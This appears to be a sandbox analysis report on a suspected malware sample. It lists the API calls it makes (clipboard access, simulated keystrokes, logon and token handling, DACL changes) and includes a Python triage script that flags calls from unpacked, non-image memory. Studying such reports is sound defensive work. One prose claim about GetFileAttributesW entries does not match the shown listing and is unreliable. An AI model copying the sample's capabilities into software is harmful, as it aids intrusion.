                                      • Instruction Fuzzy Hash: 43D05E3190520CABDB20CAA8990499A73A8A705324F004754E91583280D9359A0097A0
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,00000000,?,008C0704,?,?,00000000,?,008C0704,00000000,0000000C), ref: 008C03B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 413ce17e41e44b1fdd09f51b6e222c3adefe40586b4ad42ec04dbf39da488367
                                      • Instruction ID: bd8407aa23ac3f9d43dac8fa90a6169907ed27c0570030836ca15ac616f99a1b
                                      • Opcode Fuzzy Hash: 413ce17e41e44b1fdd09f51b6e222c3adefe40586b4ad42ec04dbf39da488367
                                      • Instruction Fuzzy Hash: 13D06C3219410DBBDF028F84DD06EDA3BAAFB48714F018000BE1856020C732E821EB90
                                      APIs
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00881CBC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem
                                      • String ID:
                                      • API String ID: 3098949447-0
                                      • Opcode ID: 0b0f9253642ed4f1d228144fbe124180923c7064a01b439bdd8fd22015bcdf62
                                      • Instruction ID: d23b72e2465eece397870ca7cfc25e436473e11f75da6cbc0642f1d13edcca0b
                                      • Opcode Fuzzy Hash: 0b0f9253642ed4f1d228144fbe124180923c7064a01b439bdd8fd22015bcdf62
                                      • Instruction Fuzzy Hash: 41C092363EC304AFF3158B81BC5AF507765A348B02F048401F609A96F3D3B22820FB50
                                      APIs
                                        • Part of subcall function 00885745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0088949C,?,00008000), ref: 00885773
                                      • GetLastError.KERNEL32(00000002,00000000), ref: 008F76DE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateErrorFileLast
                                      • String ID:
                                      • API String ID: 1214770103-0
                                      • Opcode ID: a0c354539c51f1a04844be40deb8c00564fe3ba91bce2e077f047734adcff678
                                      • Instruction ID: 5591ca9775e34f8150fb1c720cbcdf630a701b340011800b7f977d7a00847a37
                                      • Opcode Fuzzy Hash: a0c354539c51f1a04844be40deb8c00564fe3ba91bce2e077f047734adcff678
                                      • Instruction Fuzzy Hash: 2681AA302087059FDB14FF28C491A6AB7E1FF99314F08452DF996DB2A2DB34AD45CB92
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 013944D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction ID: 19db188f2e75fbf808ee954949a7d15ef61f7d5415f2c7028efe75a2de840dfc
                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction Fuzzy Hash: C8E0BF7494020EEFDB10DFA4D6496ED7BB4EF04301F1045A1FD05E7681DB309E548A62
                                      APIs
                                      • CloseHandle.KERNELBASE(?,?,00000000,008C24E0), ref: 00886266
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: b061da1430b1db9b2c4584b6566d1163cdac4b3ce11a21073fb76b201c1fbb8f
                                      • Instruction ID: 73a868243a15d9692746f75b9e1b678bdce7405aaf1608e8e50d041fc7d1bca2
                                      • Opcode Fuzzy Hash: b061da1430b1db9b2c4584b6566d1163cdac4b3ce11a21073fb76b201c1fbb8f
                                      • Instruction Fuzzy Hash: 6AE09275500B11CEC3715F1AE808452FBE5FEE13613208A6ED0E592660E3B058969B50
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 013944D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 8e9ef1b3c3f0c49e981fbbad9ced16a7153e023c13b4a7354bba936e18bf5945
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: 86E0E67494020EDFDB00DFB4D6496AD7BB4EF04301F1041A1FD01E2281DA309D508A62
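                                      The two GetFileAttributesW entries and the two Sleep(000001F4) entries above, i.e. a 500 ms sleep, are the only functions in this part of the listing whose dump is marked "based on PE: false": they execute from the region at 01392000 rather than from the SAL987656700.exe image mapped at 00880000. Calls issued from memory that no PE image backs are the usual trace of unpacked or injected code, so they are what a triager pulls out of a listing like this first. The Python below is an added example and not Joe Sandbox code; it parses a constructed excerpt of four entries copied from this page and reports the direct API calls made from non-PE-backed memory. The report states the "based on PE" flag itself; the decoding of the dump-file name (fourth field base address, fifth field page protection, seventh field memory type, compared against the winnt.h constants) is an assumption about the naming scheme, not something the report documents.

```python
import re
from dataclasses import dataclass, field

# Windows memory constants (winnt.h) used to decode two fields of the dump name.
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

# Constructed excerpt: four function entries copied from this report's listing.
SAMPLE = """\
APIs
• RtlAllocateHeap.NTDLL(00000008,00881129,00000000), ref: 008B4CBE
Memory Dump Source
• Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
APIs
• GetFileAttributesW.KERNELBASE(?), ref: 01392AE3
Memory Dump Source
• Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
APIs
• Sleep.KERNELBASE(000001F4), ref: 013944D9
Memory Dump Source
• Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
APIs
  • Part of subcall function 00885745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0088949C,?,00008000), ref: 00885773
• GetLastError.KERNEL32(00000002,00000000), ref: 008F76DE
Memory Dump Source
• Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
"""

# An API line: "• Api.MODULE(args), ref: ADDR". "(args)" is missing on some lines
# ("SendMessageW.USER32 ref: ...") and subcall lines carry a prefix.
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+: )?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>.*)\))?,?\s*ref: (?P<ref>[0-9A-F]+)\s*$"
)
SRC_RE = re.compile(
    r"^\s*•\s*Source File: (?P<dump>\S+\.sdmp), Offset: (?P<off>[0-9A-F]+), "
    r"based on PE: (?P<pe>true|false)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: str
    ref: int        # address of the call site
    subcall: bool   # True for "Part of subcall function" lines

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    dump: str = ""
    offset: int = 0
    pe_backed: bool = True   # the report's "based on PE" flag

    def dump_fields(self):
        # Assumed layout of the dump name: pid.stage.id.base.protect.state.type.index
        p = self.dump.split(".")
        return {"base": int(p[3], 16), "protect": int(p[4], 16), "type": int(p[6], 16)}

def parse_entries(text):
    """Split the listing into entries, one per "APIs" header."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.calls.append(ApiCall(m["api"], m["mod"], m["args"] or "",
                                     int(m["ref"], 16), m["sub"] is not None))
            continue
        m = SRC_RE.match(line)
        if m:
            cur.dump, cur.offset = m["dump"], int(m["off"], 16)
            cur.pe_backed = m["pe"] == "true"
    return entries

def apis_by_region(entries):
    """Sorted API names per dump offset, subcalls included as the report lists them."""
    out = {}
    for e in entries:
        out.setdefault(e.offset, set()).update(c.api for c in e.calls)
    return {k: sorted(v) for k, v in out.items()}

def calls_from_unbacked_memory(entries):
    """Direct calls from regions with no PE image behind them: the unpacked-code signal."""
    out = []
    for e in entries:
        if e.pe_backed:
            continue
        f = e.dump_fields()
        for c in e.calls:
            if not c.subcall:
                out.append((c.api, c.ref, f["protect"] == PAGE_EXECUTE_READWRITE,
                            f["type"] == MEM_PRIVATE))
    return out
```

                                      Run against the full listing, apis_by_region gives the API surface of each dump and calls_from_unbacked_memory isolates the 01392000 region; the two trailing booleans record whether the assumed name fields decode to PAGE_EXECUTE_READWRITE and MEM_PRIVATE, which is the combination expected for self-allocated code and is consistent with the "based on PE: false" flag the report prints.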
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0091961A
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0091965B
                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0091969F
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009196C9
                                      • SendMessageW.USER32 ref: 009196F2
                                      • GetKeyState.USER32(00000011), ref: 0091978B
                                      • GetKeyState.USER32(00000009), ref: 00919798
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009197AE
                                      • GetKeyState.USER32(00000010), ref: 009197B8
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009197E9
                                      • SendMessageW.USER32 ref: 00919810
                                      • SendMessageW.USER32(?,00001030,?,00917E95), ref: 00919918
                                      • SetCapture.USER32(?), ref: 0091994A
                                      • ClientToScreen.USER32(?,?), ref: 009199AF
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009199D6
                                      • ReleaseCapture.USER32 ref: 009199E1
                                      • GetCursorPos.USER32(?), ref: 00919A19
                                      • ScreenToClient.USER32(?,?), ref: 00919A26
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00919A80
                                      • SendMessageW.USER32 ref: 00919AAE
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00919AEB
                                      • SendMessageW.USER32 ref: 00919B1A
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00919B3B
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00919B4A
                                      • GetCursorPos.USER32(?), ref: 00919B68
                                      • ScreenToClient.USER32(?,?), ref: 00919B75
                                      • GetParent.USER32(?), ref: 00919B93
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00919BFA
                                      • SendMessageW.USER32 ref: 00919C2B
                                      • ClientToScreen.USER32(?,?), ref: 00919C84
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00919CB4
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00919CDE
                                      • SendMessageW.USER32 ref: 00919D01
                                      • ClientToScreen.USER32(?,?), ref: 00919D4E
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00919D82
                                        • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00919E05
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 1312020300-4164748364
                                      APIs
                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 009148F3
                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00914908
                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00914927
                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0091494B
                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0091495C
                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0091497B
                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 009149AE
                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 009149D4
                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00914A0F
                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00914A56
                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00914A7E
                                      • IsMenu.USER32(?), ref: 00914A97
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00914AF2
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00914B20
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00914B94
                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00914BE3
                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00914C82
                                      • wsprintfW.USER32 ref: 00914CAE
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00914CC9
                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00914CF1
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00914D13
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00914D33
                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00914D5A
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 4054740463-328681919
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0089F998
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008DF474
                                      • IsIconic.USER32(00000000), ref: 008DF47D
                                      • ShowWindow.USER32(00000000,00000009), ref: 008DF48A
                                      • SetForegroundWindow.USER32(00000000), ref: 008DF494
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008DF4AA
                                      • GetCurrentThreadId.KERNEL32 ref: 008DF4B1
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008DF4BD
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 008DF4CE
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 008DF4D6
                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 008DF4DE
                                      • SetForegroundWindow.USER32(00000000), ref: 008DF4E1
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 008DF4F6
                                      • keybd_event.USER32(00000012,00000000), ref: 008DF501
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 008DF50B
                                      • keybd_event.USER32(00000012,00000000), ref: 008DF510
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 008DF519
                                      • keybd_event.USER32(00000012,00000000), ref: 008DF51E
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 008DF528
                                      • keybd_event.USER32(00000012,00000000), ref: 008DF52D
                                      • SetForegroundWindow.USER32(00000000), ref: 008DF530
                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 008DF557
                                      Strings
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      APIs
                                        • Part of subcall function 008E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E170D
                                        • Part of subcall function 008E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E173A
                                        • Part of subcall function 008E16C3: GetLastError.KERNEL32 ref: 008E174A
                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 008E1286
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 008E12A8
                                      • CloseHandle.KERNEL32(?), ref: 008E12B9
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008E12D1
                                      • GetProcessWindowStation.USER32 ref: 008E12EA
                                      • SetProcessWindowStation.USER32(00000000), ref: 008E12F4
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008E1310
                                        • Part of subcall function 008E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008E11FC), ref: 008E10D4
                                        • Part of subcall function 008E10BF: CloseHandle.KERNEL32(?,?,008E11FC), ref: 008E10E9
                                      Strings
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                      • String ID: $default$winsta0
                                      • API String ID: 22674027-1027155976
                                      APIs
                                        • Part of subcall function 008E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008E1114
                                        • Part of subcall function 008E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,008E0B9B,?,?,?), ref: 008E1120
                                        • Part of subcall function 008E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008E0B9B,?,?,?), ref: 008E112F
                                        • Part of subcall function 008E10F9: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008E1136
                                        • Part of subcall function 008E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008E114D
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008E0BCC
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008E0C00
                                      • GetLengthSid.ADVAPI32(?), ref: 008E0C17
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 008E0C51
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008E0C6D
                                      • GetLengthSid.ADVAPI32(?), ref: 008E0C84
                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 008E0C8C
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 008E0C93
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008E0CB4
                                      • CopySid.ADVAPI32(00000000), ref: 008E0CBB
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008E0CEA
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008E0D0C
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008E0D1E
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E0D45
                                      • HeapFree.KERNEL32(00000000), ref: 008E0D4C
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E0D55
                                      • HeapFree.KERNEL32(00000000), ref: 008E0D5C
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E0D65
                                      • HeapFree.KERNEL32(00000000), ref: 008E0D6C
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 008E0D78
                                      • HeapFree.KERNEL32(00000000), ref: 008E0D7F
                                        • Part of subcall function 008E1193: GetProcessHeap.KERNEL32(00000008,008E0BB1,?,00000000,?,008E0BB1,?), ref: 008E11A1
                                        • Part of subcall function 008E1193: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008E11A8
                                        • Part of subcall function 008E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,008E0BB1,?), ref: 008E11B7
                                      Similarity
                                      • API ID: Heap$Process$Security$Free$AllocateDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 4042927181-0
                                      APIs
                                      • OpenClipboard.USER32(0091CC08), ref: 008FEB29
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 008FEB37
                                      • GetClipboardData.USER32(0000000D), ref: 008FEB43
                                      • CloseClipboard.USER32 ref: 008FEB4F
                                      • GlobalLock.KERNEL32(00000000), ref: 008FEB87
                                      • CloseClipboard.USER32 ref: 008FEB91
                                      • GlobalUnlock.KERNEL32(00000000), ref: 008FEBBC
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 008FEBC9
                                      • GetClipboardData.USER32(00000001), ref: 008FEBD1
                                      • GlobalLock.KERNEL32(00000000), ref: 008FEBE2
                                      • GlobalUnlock.KERNEL32(00000000), ref: 008FEC22
                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 008FEC38
                                      • GetClipboardData.USER32(0000000F), ref: 008FEC44
                                      • GlobalLock.KERNEL32(00000000), ref: 008FEC55
                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 008FEC77
                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 008FEC94
                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 008FECD2
                                      • GlobalUnlock.KERNEL32(00000000), ref: 008FECF3
                                      • CountClipboardFormats.USER32 ref: 008FED14
                                      • CloseClipboard.USER32 ref: 008FED59
                                      Similarity
                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                      • String ID:
                                      • API String ID: 420908878-0
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • DragQueryPoint.SHELL32(?,?), ref: 00919147
                                        • Part of subcall function 00917674: ClientToScreen.USER32(?,?), ref: 0091769A
                                        • Part of subcall function 00917674: GetWindowRect.USER32(?,?), ref: 00917710
                                        • Part of subcall function 00917674: PtInRect.USER32(?,?,00918B89), ref: 00917720
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 009191B0
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009191BB
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009191DE
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00919225
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0091923E
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00919255
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00919277
                                      • DragFinish.SHELL32(?), ref: 0091927E
                                      • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00919371
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                      • API String ID: 4085959399-3440237614
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 008F69BE
                                      • FindClose.KERNEL32(00000000), ref: 008F6A12
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008F6A4E
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008F6A75
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 008F6AB2
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 008F6ADF
                                      Strings
                                      Similarity
                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                      • API String ID: 3830820486-3289030164
                                      • Opcode ID: 8fa4804bf4b381e8b57089eb6bd721a1a8649cbd15d2b5fe0e98832f070074c0
                                      • Instruction ID: 60c273012d6f5aa0b2f9a194c6a71dc210cd5c2acb9803b4b736de87fbbdd30e
                                      • Opcode Fuzzy Hash: 8fa4804bf4b381e8b57089eb6bd721a1a8649cbd15d2b5fe0e98832f070074c0
                                      • Instruction Fuzzy Hash: FAD14BB2508304AAC714EBA8C981EBBB7E8FF98704F44491DF685D6191EB74DA44CB63
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 008F9663
                                      • GetFileAttributesW.KERNEL32(?), ref: 008F96A1
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 008F96BB
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 008F96D3
                                      • FindClose.KERNEL32(00000000), ref: 008F96DE
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 008F96FA
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 008F974A
                                      • SetCurrentDirectoryW.KERNEL32(00946B7C), ref: 008F9768
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 008F9772
                                      • FindClose.KERNEL32(00000000), ref: 008F977F
                                      • FindClose.KERNEL32(00000000), ref: 008F978F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
